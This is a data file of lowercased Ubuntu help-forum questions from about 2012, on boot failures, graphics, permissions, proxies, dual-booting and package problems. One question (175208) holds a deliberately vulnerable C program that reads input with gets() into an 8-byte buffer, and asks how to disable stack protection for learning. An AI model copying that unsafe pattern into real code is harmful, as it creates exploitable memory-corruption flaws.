175142	boot failure on powerpc mac with encrypted lvm	i have a powerbook g4 that was previously running debian squeeze , and before that , os x leopard . it worked fine under debian , but i disliked the gui , so i decided to give ubuntu a try . i downloaded a copy of the powerpc desktop iso , but the gui was messed up : most of the screen was taken up by a large white rectangle , which was presumably supposed to be a window , but did n't load properly . nothing happened when i clicked on the menus at the top , except for the one in the top-right corner that has shutdown options . i tried to restart it using that , but i did n't get a dialog or anything , so i finally ended up using control-command-power to force a reboot . i then tried the alternate iso to see if i could just use the textual installer . that worked , and i do n't remember having any problems with the login screen , but after that , i had the same problems as with the live disc . i had no problems using the tty 's , though , which is mostly what i did under debian . i later found that if you want full-disk encryption , you must set it up at install time . so i rebooted to the alternate disc and wiped the entire hard disk again , choosing the entire hard disk with encrypted lvm option during partitioning . the installation completed successfully , but now when i try to boot , i get just a black screen after the yaboot menus , no password prompt or anything . how can i fix this ?
175145	ubuntu 12.04 freezes randomly	i 'm running dell inspiron 15r with intel hd graphics , 3 gb ram , 64-bit operating os . the problem is my computer freezes randomly , the touchpad gets stuck , nothing to do but to shut down by manually pressing the power button . i made a clean install today of the ubuntu os and 30 minutes later , there is no overheating in my laptop nor any loud fan noise . what could cause this issue ?
175147	which ubuntu will work ?	i 've just built a new computer using an amd a6-3650 apu with amd radeon 6530 hd graphics 2.6ghz socket fm1 100w quad-core processor and a gigabyte ga-a75m-d2h fm1 amd a75 ( hudson d3 ) hdmi sata 6gb/s usb 3.0 micro atx amd motherboard with g.skill ripjaws series 8gb ( 2 x 4gb ) 240-pin ddr3 sdram ddr3 1600 ( pc3 12800 ) desktop memory model f3-12800cl9d-8gbrl . 12.04 would n't install , and 10.04 hangs up after i select english as my language , whereupon a second language selection screen appears and freezes . then i ca n't shut down except by turning off the power supply . memory check passes ( although then goes into endless loop ) . i 'm not comfortable fiddling around with a lot of code , just want a version that will run . thanks john
175149	how to provide user permission to read , write on `/dev/sdax` ? what is the syntax ?	i have two my hard disk divided into two partition ( apart from swap ) . first one is /dev/sda3 on which i have my ubuntu installation . second one is /dev/sda1 . now , when i try to copy a file to /dev/sda1 , i need to do a sudo , because my user does not have permission . how do i give read , write permission to my user ? i know chmod 777 is a bad idea . how about chown or chgrp ? by the way , /dev/sda1 is mounted as /media/hood , so what should be the syntax my command ? i have two my hard disk divided into two partition ( apart from swap ) . first one is /dev/sda3 on which i have my ubuntu installation . second one is /dev/sda1 . now , when i try to copy a file to /dev/sda1 , i need to do a sudo , because my user does not have permission . how do i give read , write permission to my user ? i know chmod 777 is a bad idea . how about chown or chgrp ? the output of mount command is as as follows : /dev/sda3 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devp ts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/chirag/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=chirag ) /dev/sda1 on /media/hood type ext4 ( rw , nosuid , nodev , uhelper=udisks )
175151	installation of ubuntu fails on my dell latitude d630	i can boot the usb live ubuntu 12.04 , but when i try to launch the installation program from the desktop nothing happen . i do n't know how to proceed to check what is going on but i also tried to use the system monitor and everything works except when i click on the `` system '' tab , in this case the monitor stops and disappears . does anyone know the solution for this issue ? is ubuntu compatible with dell lattitude laptops ?
175155	update manager will not install updates	when i go into update manager it says that i have 161 updates , i hit the install button and a box comes up that says `` to install or remove softwere you need to authenticate '' i put in my password and then i hit install again another box comes up that says `` applying changes '' i sit back and wait and nothing happens ! i even let it continue overnight & when i checked it the next morning there was still nothing happening so i hit the cancel button . at th top of the page it reads `` important software for this computer '' why wont anything install ?
175156	create a document question mark in file name	can somebody help me create a attachment with question mark in file name ( test ? .doc or test ? .pdf ) and attached to domino doc server and send me the 2 nsfs ? i need to test whether at the os window side , will the attachment file name change to underscore - ( test_.doc or test_.pdf ) at window domino doc server . thanks in advance .
175157	is it possible to dual boot chrome os and ubuntu on a samsung chromebook 5 ?	i found some info about this when googling but it is pretty confusing . i thought i would ask the pros . if this can be done , i would like some direction as far as where to go for correct information and downloads .
175158	can ubuntu pc be connected to a television ?	i have old p4 computer that i 've installed ubuntu 12.04 on , and it works fine when connected to a monitor using vga to vga connection . i tried connecting the pc to my 44inch television using a vga ( from pc ) to rca component cord ( red , green blue ) . i 've connected the sound card of the pc to the composite rca ( red , white , yellow ) . nothing shows up on the television . it 's just black . not even the booting shows up . i disconnected the composite and left only the component connected . still nothing . should i change something in the ubuntu settings prior to connecting it to the television , or am i trying to perform something that is impossible ? should i be using a vga to composite instead ?
175160	hdmi initially worked , no more and screen issues when try	connected my system76 lemur ultra ( intel i5 3210m + intel hd 4000 ) to my television . it showed up fine . after about 15 seconds , it abruptly disconnected for some reason with a `` no signal '' error on the television . the open programs on my computer were having issues opening the window until i unplugged the hdmi cable . i have never tried the hdmi port/cable . i upgraded my kernel to 3.5.1 yesterday using the stable ubuntu kernels due to direct connect ( wifi connect by two computers , no router required ) and to get more support for my graphics card ( hd 4k ) . lspci | grep `` vga '' returns : 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) . it wo n't even show up on the television at all now . i tried to boot into it with the hdmi cable connected and it does n't work correctly . if i connect it , it says `` searching for signals '' then goes to `` no signal '' again . i think it is something with ubuntu or linux ( kernel ) . if anyone could help me get this working , it would be much appreciated . i also tried changing the resolution - to no result ( i did switch it back ) . i did change the sound over to the hdmi section instead of the speaker . i did n't get a chance to test the sound however . ubuntu 64 bit 12.04 linux kernel 3.5.1
175161	where are the opencv development libraries installed ?	i need to install facedetect in matlab but it needs opencv library files and it has to be included during the compilation . so where is it ? ( in ubuntustudio ) !
175163	reinstalling windows 7 on a new hdd which has 12.04 installed	my hard disk died and i had to get a new 250gb and in the process of recovering my files from old hard disk using ubuntu , i fell in love with it . so in my new hdd , i just installed ubuntu first since i did not have a windows 7 cd and i liked ubuntu and was already learning stuff on python . now its summer and i want to reinstall windows 7 so i can play some games . do n't know how to go about making space for windows 7 as well as what other things to do , please help . i have about 100gbto spare so that should be more than enough , i just do n't know what to do . should i use gparted to make space and then install windows 7 and then fix grub ? or another easier way ?
175164	cant install windows programs with wine	i am trying to install a couple windows programs . i have tried wine itself , playonlinux & crossover . no matter which one i try , i get the same error message : `` access denied '' i tried logging in as root , thinking this would work , but still got the same results . i am running ubuntu 12.04 , 32 bit . additional details as requested : i am using installation cd 's . i have been able to install windows programs before , so this is a new problem that occurred after updating my system . all was fine before that . the install files are on the cd 's . permissions ? i assume so since as i said , i had installed other windows software without issue before the upgrade . and yes , i have checked compatibility & all 3 programs are said to work well in wine/crossover . the prgrams i am trying to install are : 1 . age of empires iii ( crossover rank : gold ) 2 . quicken 2011 ( crossover rank : silver ) 3 . steam ( crossover rank : silver ) update : iright click on the .exe file & allow executing as program is not selected . also , it wont let me change them , says permissions could not be changed .
175169	after suspend bluetooth on my lenovo e120 can`t be turned on	after my computer wakes up from being suspended bluetooth is hard blocked : i can`t turn on bluetooth . notebook lenovo e120
175171	login to gnome-session is broken	when i come to the ubuntu 12.04 lightdm login screen , i get several options for logging into desktop environments . there is unity and gnome and gnome-classic etc ... when i select unity , it logs me into unity and when i select gnome , it logs me into unity o_o i also notice that even after selecting the gnome3 session , the icon on the login box is the same as the unity icon . i do n't see the goofy gnome foot icon there . one more important factor when i do `` gnome-shell -- replace '' from inside of unity i get a perfectly wonderful gnome-shell environment . this means that there must be something wrong with gnome-session or lightdm ... what should i do ? i want to be able to select gnome3 from lightdm login screen and then login to gnome-shell like i should . update 20120813 morning i just used synaptic and reinstalled gnome-session and gnome-session-common and restarted and the icon problem is fixed but logging into gnome logs me into unity for some reason . update 20120813 afternoon i 've narrowed the list of possible problems a little bit . i created a new user and logged into gnome3 with no problems whatsoever ... . so the problem must be user specific ... it must be something in my home folder that is causing the problem ... correct ?
175172	how do i configure proxies in ubuntu server or minimal ( cli ) ubuntu ?	how do you configure proxy settings in the ubuntu server or minimal ( cli ) versions using the terminal ?
175174	why ca n't i increase the size of sda1 using gparted ?	i am trying to resize my /dev/sda1 as shown in the diagram using the gparted live cd.however although i have unallocated space i am unable to expand it.i have tried expanding /dev/sda2 ( which works ) and then decreasing its size from the beginning ( which doesnt ) . but that doesnt work either . could someone please tell , me how to resize my /dev/sda1 partition .
175176	i accidentally disabled my ubuntu profile	i was trying to upgrade my 2nd computer 's hard drive , and in the process , i un-admin 'd and disabled my account . i 'm using the guest account right now . i 've tried everything that ask ubuntu has to offer ( or at least after 5 hours of searching , trying , and failing ) i.e. , creating a new account ( did n't allow me to do it ) , usermod , passwd , anything involving sudo , hell , i ca n't even get into recovery mode with the left shift thing ... i really want to get into my account . please help me .
175178	purple blank screen on quitting ubuntu installation or shutting down	i just bought an hp pavilion m6- 1045dx laptop with windows 7 pre-installed . i am unable to install ubuntu alongside windows , so i am considering replacing windows completely . but since i have not been given a wwindows installation cd , i am concerned that ubuntu may give me the following trouble that it is giving when i select `` try ubuntu '' during installation : all versions of ubuntu that i tried ( 10.10 , 11.04 , and 12.04 ) would either freeze to the purple ubuntu background , or as in 12.04 , to a blank screen . i corrected the blank screen by selecting nomodeset in the beginning . but when i try to shutdown or quit an installation , it does not turn off my laptop completely , but freezes to the purple screen . i am forced to shutdown the laptop by keeping the power button pressed , once i hear that the cd has stopped spinning . i do not want to install ubuntu , replace windows , and then find that i can use neither . i am not sure if this is relevant , but the installation usually gives a message like failed to enable msi-x , but then proceeds with it .
175180	why do i get a `` can not execute csh ... '' error when i try to `` sudo su '' ?	i get this error when i try do sudo su reputa @ reputa : ~ $ sudo su can not execute csh : no such file or directory sudo -i is working fine but i want to use sudo su . how do i make it happen ?
175181	how to properly modify the sudoers file to create a launcher in order to shutdown the system ?	i did it adding the following line , but does n't work ( at least in my case ) : username all= ( all ) nopasswd : /sbin/shutdown -h now then making a launcher in the desktop with the following instruction : sudo shutdown -h now when i tried it , keeps asking me the password . what am i doing wrong ? ps : i 'm using visudo
175182	bootmgr is missing when booting with ubuntu liveusb	i downloaded 64bit ubuntu and i put it on my usb . it is bootable , and bios is configured to boot from it . but when i turn on the laptop with usb in it , it says : bootmgr is missing . press ctrl+alt+del to restart . i have windows 7 64bit installed and i want to keep it . ( dual boot or something ) device : hp pavilion g7 1303
175184	my password wo n't work	i 've tried to change in grub but does n't work . `` mount -o rw ; remount '' does n't allow it either
175186	how to get the dual boot option window ?	i installed ubuntu 12.04 using wubi on windows 7 for dual-boot , now i dont see windows option while booting . it directly boots only ubuntu . what should i do to get the dual boot option window ?
175188	vidalia fails to anonymize despite showing green onion	here 's what i have done : sudo apt-get install vidalia and it has been installed after that i 've set the proxy settings in network to localhost:8118 and applied it system wide ; however , when i want to install a package via apt-get an error logs saying : unable to connect to localhost:8118 : [ ip : 127.0.0.1 8118 ] also tor check is not working because i ca n't connect to the internet at all when the proxy option is applied . the main propose of using tor here is to use it with terminal . update : i 've already applied the configuration to the polipo , fyi .
175196	why are the latest releases of programs not in the software centre ?	the way i understand the ubuntu project from a corporate point of view is that companies can partner with canonical and have their software placed in the ubuntu 's software center . my question is why do some releases of programs take such a long time to load where others do not , i.e . firefox is loaded almost immediately , whereas skype 4.0 took weeks even months and then it was not even up to date . question : whose responsibility is it to load new software and why is n't the ubuntu center one of the first point of calls for such uploads . the failure to upload for instance skype has the web go crazy with disclaimers such as its not yet available in ubuntu . this makes the ubuntu project seem somewhat out of date ?
175202	how do i hide an lvm physical volume from the devices section on the nautilus side pane ?	i installed 12.04 on my netbook with the alternate cd iso . i have set up 3 partitions and encrypted them with dm_crypt . when i boot up , i enter a pass phrase for each partition and they are all accessible after i log in , but they show up under the devices pane in nautilus . how can i prevent them from showing up ? i have them in fstab as /dev/mapper .
175208	how do i enable a buffer overflow ?	i just installed 12.04 ( wubi actually ) and i wanted to learn a bit about buffer overflow . unfortunately when i try to use a function like puts ( ) and gets ( ) in an incorrect manner ( that is , to cause a buffer overflow ) , gcc tells me that it detected smashing the stack and terminate my program . how do i enable stack overflow ? for more clarity , this is the program : # include < stdio.h > canneverexecute ( ) { printf ( `` i can never execute\n '' ) ; exit ( 0 ) ; } getinput ( ) { char buffer [ 8 ] ; gets ( buffer ) ; puts ( buffer ) ; } main ( ) { getinput ( ) ; return 0 ; }
175213	apache can not assign requested address error	i changed etc/apache2/ports.conf and wrote **.***.** . ***:80 but when i want to restart the apache2 i see the following error : ( 99 ) can not assign requested address : make_sock : could not bind to address **.***.** . ***:80 what can i do ? please help .
175221	how do i replace a directory with a symlink and retain the folder emblem ?	i want to replace the folders in my home/ directory with symlinks to folders in another location , but i want to retain the folder emblems without having to go searching for them . how do i do this ? to illustrate what i 'm asking , the directories in the home folder have nice emblems that look like this : if i just delete this folder and replace it with a symlink the music emblem is lost and replaced by a link emblem . i want it to have have both the music emblem and the symlink emblem , like this : preferably i 'd like to be able to do this without having to manually hunt down and set the icon for the folder ( but a good answer explaining how to do so would be upvoted as a good alternative ) .
175224	quickly , setup.py , long_description - how to make them generate a multi-paragraph description in the debian control file ?	how can i make quickly convert the long_description in setup.py into several paragraphs in the debian control file ? quickly throws the error below if i put `` \n '' in the text , and every other way i try just leads to one long one-paragraph description ( i.e . everything concatenated in a single paragraph ) . generally - can we use any type of markup - bullets , etc. ? i see some entries in usc that use bullets in the description , so it must be possible . traceback ( most recent call last ) : file `` /usr/bin/python-mkdebian '' , line 366 , in < module > egg = get_egg_info ( ) file `` /usr/bin/python-mkdebian '' , line 35 , in get_egg_info k , v = l.strip ( ) .split ( ' : ' , 1 ) valueerror : need more than 1 value to unpack
175231	tell banshee to add covers inside mp3 tags	i am using banshee to encode my old cds into nice mp3 . banshee is able to find cds information and albums covers but it does n't add these covers inside the mp3 's tag . as a consequence , when using another player , covers are not there . is there a way to change this behaviour without using an external mpe tags editor ? thanks , manu
175236	ubuntu - patch diff merge issue	i have two text files test1.txt and test2.txt with content as test1.txt 1 2 test2.txt 1 2 3 4 what i have achieved with the txt files is a difference of both files in a third file as diff test2.txt test1.txt > test.patch patch test.txt < test.patch in text.txt i have the resultant difference of both files . now i am doing the same with csv files . the format for csv files is like henry constantine | 02256 | medical | speciality diff small2.csv small1.csv > small.patch patch small.csv < small.patch *note : i have created the small.csv file manually . but i get the following error when i run the patch patching file small.csv hunk # 1 failed at 1 . 1 out of 1 hunk failed -- saving rejects to file small.csv.rej does anyone have any idea of how to achieve the above difference file for csv files .
175238	how to automatically boot without asking for username and password ?	i 've just installed ubuntu 12.04 and i 'm new to it . every time i turn on the computer ubuntu asks for username & password to log in , i do n't want that to happen & i just want it to log in automatically without asking about username and password , what should i do ? thanks for helping
175245	udev not updating usb permissions and group	i am using ubuntu 10.04 lts - locid lynx . i have a requirement to set specific group and permissions for any usb stick file/directories on mount . i have tried overwriting the udev rules . here is what i have done : created 99-test.rules under /etc/udev/rules.d/ directory with content as subsystems== '' usb '' , group= '' tomcat6 '' , mode= '' 0777 '' , name= '' test '' sudo service udev restart now when i mount the usb stick and run 'sudo blkid ' , it prints /dev/test : uuid= '' 002a-0aa5 '' type= '' vfat '' but the ls -l /media/ gives back drwx -- -- -- 4 admin admin 8192 1969-12-31 16:00 002a-0aa5 it seems that above rule from 99-test.rules is getting applied but getting overwritten afterwards , thus changing group and permissions back to some default value . what is it i am missing here ? do i have to change anything else ?
175248	how to autologin ( without entering username and password ) ( in text mode )	i 've installed ubuntu 12.04 & and edited the /etc/default/grub file to auto boot into text mode . but every time i turn on the computer it asks for username and password ( in text mode ) , i wanted it to automatically login without asking for username and password , so in graphical mode i went to `` system setting- > user accounts '' and checked the `` automatic login '' , but it did n't work . so what should i do to automatically log in even in text mode ?
175251	ca n't get media player and actions working on unity webapps	i 'm following the api documentation at http : //developer.ubuntu.com/api/ubuntu-12.04/javascript/ my code , very simplistic : var unity = external.getunityobject ( 1,0 ) ; unity.init ( { name : `` radio battletoads '' , iconurl : `` http : //new.radiobattletoads.com/images/icon.png '' , oninit : setupmediaplayer } ) ; function unityplaypause ( ) { // todo } function setupmediaplayer ( ) { // test the media player unity.mediaplayer.init ( `` radio battletoads '' ) ; var trackinfo = { title : `` todo '' , album : null , artist : null , artlocation : null } ; unity.mediaplayer.settrack ( trackinfo ) ; // test an action unity.addaction ( '/reproducir ' , unityplaypause ) ; // test a notification unity.notification.shownotification ( `` test '' , '' test '' , null ) ; } the notification is shown , but neither the media player nor the action are working . i 've taken a look at the bundled userscripts and i ca n't see any remarkable difference from my code . has somebody experienced this ? installed version : $ dpkg -l | grep unity-webapps ii libunity-webapps-chromium 1.9-0precise2 unity webapp extension for chromium/chrome browser ii libunity-webapps0 1.9.1-0precise2 web apps integration with the unity desktop ii unity-webapps 1.9-0precise2 unity webapp integration scripts ii unity-webapps-preview 2.1 unity webapps preview metapackage ii unity-webapps-service 1.9.1-0precise2 service for web apps integration with the unity desktop
175255	problem in connection of wi fi in asus	i m using asus eee pc1015px in my apartment we are using wi fi internet connection . everyone gets connection but for me no showing any connection even though i m very near to router . i tried for a week `` no connections are available '' is displaying.my wi fi is on . please post me agood answer
175260	sites-available subfolders and a2ensite ?	due to my job on my localhost i have a lot ( think 50+ ) sites running , these are for about 8 different clients , i want to organise my sites into subfolders . i tried putting my sites in subfolders e.g . /etc/apache2/sites-available/client1/first-site /etc/apache2/sites-available/client1/second-site /etc/apache2/sites-available/client1/third-site /etc/apache2/sites-available/client2/first-site2 /etc/apache2/sites-available/client2/second-site2 but using any combination of : a2ensite client1/first-site a2ensite first-site says the site does not exist . if i use : a2ensite client1 then i can enable/disable the entire directory , but that 's not really what i want.. is this feasible ? or will i have to manually create the symlinks ? if so is there a function i can use as a replacement for a2ensite that will handle subfolders ?
175261	can gedit also backup files like `` untitled document 1 '' ?	gedit can make backups of files that have already been saved once . but can it make backups of files that i have just created , and not saved yet ? those files are typically shown as `` untitled document 1 '' etc . motivation : i often create new text files to quickly write a phone number or something , and ubuntu 2012.04 crashes quite often , so i end up loosing information sometimes . if gedit can not do this , is there a similar , fast-to-start program that has this feature ?
175264	how to update ubuntu 12.04 through squid proxy server at my university ?	i wish to update the local package index with the latest changes made in repositories and am using following command : sudo apt-get update on executing this command i get several error messages such as one below : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 407 proxy authentication required what i did to in order to try resolving this issue is the following : open terminal and the file /etc/bash.bashrsc sudo gedit /etc/bash.bashrc and add at the bottom of the file these 2 lines : export http_proxy=http : //user : password @ host : port/ export ftp_proxy=http : //user : pass @ host : port/ however it is still not working for me and am getting the same error . thanks in advance .
175265	how can i shorten my prompt ?	when i open the terminal , it looks like this ( without the * 's ) montenrgro @ montenrgro-ge620-*******-*******-***** : ~/desktop $ the code thing and montenrgro @ montenrgro takes up a lot of space , on my laptop . any way i can decrease it to just : /home/desktop . i 'm sure there is some kinda of specialization to the terminal , but i ca n't find it . i 've tried changing profile but that does n't seems to work either
175266	desktop does not show icons	since this morning , i have some files in the desktop , but i can not see them . i know nothing has been deleted , as i can see what 's on the desktop whenever i try to save anything from the internet . how could i make the documents visible again ? it 's even stranger the fact that i can not see anything i had yesterday ( except for a shortcut ) , but i can see documents i save there today . thank you .
175270	if i download a package through apt-get on one machine and install on another , can i upgrade later ?	i have a machine that does not have an internet connection and i need to download a few packages to it . i can use apt-get download xxx to get the package , but , if i ever connect this machine to the internet , will apt-get update / upgrade know what this package is and update it successfully , or will it cause problems in the future ?
175273	how to prevent networkmanager from taking control of a specific network interface ?	i want to set up a mesh network using batman-adv , but networkmanager keeps taking control of the second adapter ... i need to be able to selectively tell networkmanager not to manage one specific device . is this possible ?
175276	how to get rid of the fogger lens ?	though i prefer using fogger instead of creating web-apps in chrome , i do n't need the fogger lens in my unity dash . the few web-apps i have are easily found via global search or applications lens . i tried sudo apt-get purge unity-lens-fogger and some variations , but had no success . can anyone tell me under what name the fogger lens can be removed ?
175279	ubuntu software center not progress	there is a task in `` progress tab '' of the ubuntu software center : `` searching canceling '' . it is in an infinite loop and i can not remove it . also , i can not install new software because it is waiting for the above task to end . ? ? ?
175281	rename files by regexp in command line	i do a mistake when trying to move files from one location to another . now all files are moved , but there is a * concatenated at the end of all names . how do i remove all *s from end of file names in command line ? note : i 'm working with an embedded system , there is not any internet connection . please provide solutions with no need to install new stuff . thanks in advance
175283	problems installing ubuntu using cd somebody help please	i tried installing ubuntu 64bit on my new laptop which now has windows 7 64bit ( preinstalled ) . i want to install ubuntu and keep windows 7 . i burned .iso on a cd , i put it in cd drive and rebooted . i saw a keyboard logo and then there was a black empty screen . i take the cd out of the cd drive and turned off using the power button . i then boot to windows and ran wubi.exe that was on the disc . i clicked help me run from live cd ( actually it was in slovenian ) . then it finished its job and i rebooted . i got no wubildr stuff and then completing ubuntu installation . press esc to see boot options . i added nomodeset to normal mode and ubuntu ran . but when i clicked install alongside windows ( in ubuntu ) there was a black screen which told me to remove cd from tray and to press enter to continue . i did that and the computer rebooted , and nothing special happened . no installation , i tried again and it did n't worked . please help .
175286	how do i start a program on my desktop from an ssh session ?	lets say i want to start teamviewer on my home-desktop which i currently only have ssh access to . how would i do that ?
175289	black screen with installation acer 4736z	i presently work with 10.04 on my acer 4736z . i tried upgrading to 11.04 . the installation was successful , but there was some problem such that the screen remained dark . i noticed the successful installation because i could see the opening screen at certain angles in bright light , however the overall appearance of the screen was dark . ultimately i had to reinstall 10.04 . i want to now upgrade to 12.04 lts , but i remain apprehensive . any suggestions ?
175296	ubuntu 12.04 upgrade problem ( the package system is broken )	the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f details : the following packages have unmet dependencies : gir1.2-mutter-3.0 : gnome-shell : depends : libgjs0-libmozjs185-1.0 but it is a virtual package depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:1.1-0ubuntu15.1 is installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:1.1-0ubuntu15.1 is installed depends : libxfixes3 ( > = 1:5.0 ) but 1:5.0-4ubuntu4 is installed depends : gnome-shell-common ( = 3.5.4+git20120721.r1.dd80f390-0ubuntu1~12.04~ricotz1 ) but 3.5.4+git20120721.r1.dd80f390-0ubuntu1~12.04~ricotz1 is installed libmutter0 : depends : libice6 ( > = 1:1.0.0 ) but 2:1.0.7-2build1 is installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build1 is installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is installed depends : libxrandr2 ( > = 2:1.2.99.3 ) but 2:1.3.2-2 is installed
175299	how to install dpkg-reconfigure ?	i want to install dpkg-reconfigure in ubuntu 12.04 lts install on amazon ec2 ? how to go about it ?
175306	what alternatives are there to fiddler debugging proxy ?	i 'm looking for a good and famous web debugging proxy that can logs all http ( s ) traffic . like a fiddler for windows . i found that it does n't work on ubuntu . so is there any one for ubuntu ?
175316	remove keyboard layout	when i first started using ubuntu , only a german keyboard layout was setup in system | preferences | keyboard as the keyboard is actually a uk keyboard , i added a uk keyboard and removed the german keyboard . however , every time i log out , then back in again , the german keyboard is restored as the default ( the uk keyboard is also available ) . is there a way that i can permanently remove the german keyboard , such that the uk keyboard is always used by default ?
175322	ca n't start drracket	i downloaded the unix source for racket5.3 http : //racket-lang.org/download/ and followed the build instructions , it installed succesfully . i tried running ./drracket from the created /bin directory but it results in the following error message : ffi-lib : could n't open `` libgdk-x11-2.0.so.0 '' ( libgdk-x11-2.0.so.0 : can not open shared object file : no such file or directory ) context ... : /home/jon/scr-downloads/racket-5.3/collects/mred/private/wx/gtk/utils.rkt : [ running body ] /home/jon/scr-downloads/racket-5.3/collects/mred/private/wx/gtk/init.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/mred/private/wx/gtk/platform.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/mred/private/wx/platform.rkt : [ running body ] /home/jon/scr-downloads/racket-5.3/collects/mred/private/kernel.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/mred/private/mred.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/mred/mred.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/mred/main.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/racket/gui/base.rkt : [ traversing imports ] /home/jon/scr-downloads/racket-5.3/collects/drracket/drracket.rkt : [ traversing imports ] i would appreciate any help in fixing this issue . thanks .
175323	dhcp3-server do n't want ipv6 address	recently we upgraded from a windows 2003 dhcp server to a ubuntu 10.04 dhcp3-server . the problem i am faced with now is that my windows 7 clients are now getting ipv6 ip address along with the ipv4 address . this is creating a aaaa record in our windows dns server . but when i switch back to the windows dhcp server the address does n't get assigned and no aaaa record is created in the dns server . i have set ddns-update-style none ; and ignore client-updates i can disable ipv6 on the computer it self but i would like to find out what the setting that will make the dhcp not assign a ipv6 address to w7 clients or disable auto-config for ipv6 on w7 pcs . thanks . authoritative ; ddns-update-style none ; log-facility local7 ; ignore client-updates ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.50 192.168.1.58 ; default-lease-time 86400 ; max-lease-time 86400 ; option routers 192.168.1.1 ; option ip-forwarding off ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.225 ; option domain-name-servers 192.168.1.2 , 192.168.1.3 ; option domain-name `` my.domain '' ; } host host1 { hardware ethernet ff : ff : ff : ff : ff ; fixed-address 192.168.1.50 ; } host host2 { hardware ethernet aa : aa : aa : aa : aa ; fixed-address 192.168.1.51 ; } cheers !
175325	is my amazon ec 2 running amazon linux or ubuntu ?	i am a little confused here . i created a amazon ec2 instance with ubuntu linux 64-bit 12.04 lts , now when i ssh into it i get the following but on amazon management console i get the following what is wrong here ?
175331	belkin c300 keyboard not typing anything while booting	while booting using the belkin c300 keyboard , power led on keyboard has power , but no key press works . but on using another keyboard while booting everything works fine.after booting when i reconnect this same belkin c300 keyboard , then i can type everything using the same belkin c300 keyboard.need help to solve this one . totally stumped by this one.actually bought this belkin one as the only other option was a microsoft keyboard .
175336	is installing wine in ubuntu safe ?	according to many articles like this one , it says that windows is more vulnerable to virus . i recently installed wine on my ubuntu to run some windows programs by sudo apt-get install wine it when i looked into the directory structure i got to know that the windows program regedit.exe has been installed along with other simple windows programs . as per my knowledge some of the windows viruses give network access to registry making windows vulnerable for attacks . i am worried that installing wine would make the system vulnerable . is it so ? are there any solutions to this problem ?
175338	swapon -- all -- verbose : 'read swap header failed : invalid argument '	recently ran through enablehibernatewithencryptedswap and ran the following command : swapon -- all -- verbose and received : 'read swap header failed : invalid argument' how do i fix this ? here 's some more pertinent output ... output of sudo fdisk -l : disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00006d20 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 156301311 77899777 5 extended /dev/sda5 501760 156301311 77899776 8e linux lvm disk /dev/mapper/ubuntu -- t10194-root : 75.5 gb , 75539415040 bytes 255 heads , 63 sectors/track , 9183 cylinders , total 147537920 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- t10194-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- t10194-swap_1 : 4227 mb , 4227858432 bytes 255 heads , 63 sectors/track , 514 cylinders , total 8257536 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x08040000 disk /dev/mapper/ubuntu -- t10194-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 4225 mb , 4225761280 bytes 255 heads , 63 sectors/track , 513 cylinders , total 8253440 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd2236983 disk /dev/mapper/cryptswap1 does n't contain a valid partition table thanks for any and all help !
175345	why is n't the iceland mirror working ?	i have already tried sudo apt-get update & & sudo apt-get upgrade but then it cant connect to [ to is.archive.ubuntu.com ] [ 1 ] and when i try to use update manager this comes w : failed to fetch http : //is.archive.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to is.archive.ubuntu.com : http : ... .
